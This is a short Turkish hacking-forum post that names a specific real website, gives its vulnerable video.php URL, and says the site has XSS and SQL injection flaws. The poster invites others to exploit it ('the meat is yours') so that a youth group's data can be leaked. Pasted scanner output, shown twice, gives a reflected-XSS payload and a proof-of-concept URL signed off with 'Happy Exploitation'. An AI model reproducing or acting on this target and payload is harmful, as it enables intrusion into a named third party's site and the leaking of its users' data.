Konu Head'ındaki gibi, kömünist sitesinde XSS+SQLi var. Denemedim ya da uğraşmadım linki bırakıyorum rez gelirse Ak Gençlik leaklarıda gelir. 
http://www.arizasiz.com/m/video.php?id=95
Hidelemedim.. Eti sizin hadi kemiğide...
Unutmadan POC Çıktısı (Hidelendi..)
[!] Now Scanning for XSS
[!] Please wait ....
[*] Payload Found . . .
[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <a class="fb" href="http://www.facebook.com/sharer.phpu=http://www.arizasiz.com/m/video.php?id=95x"x>x"></a>
[*] POC: http://www.arizasiz.com/m/video.php?id=95%78%22%78%3e%78
[*] Happy Exploitation
[!] Congratulations you've found 1 bugs
http://www.arizasiz.com/m/video.php?id=95
Hidelemedim.. Eti sizin hadi kemiğide...
Unutmadan POC Çıktısı (Hidelendi..)
View hidden content is available for registered users!
[!] Now Scanning for XSS
[!] Please wait ....
[*] Payload Found . . .
[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <a class="fb" href="http://www.facebook.com/sharer.phpu=http://www.arizasiz.com/m/video.php?id=95x"x>x"></a>
[*] POC: http://www.arizasiz.com/m/video.php?id=95%78%22%78%3e%78
[*] Happy Exploitation
[!] Congratulations you've found 1 bugs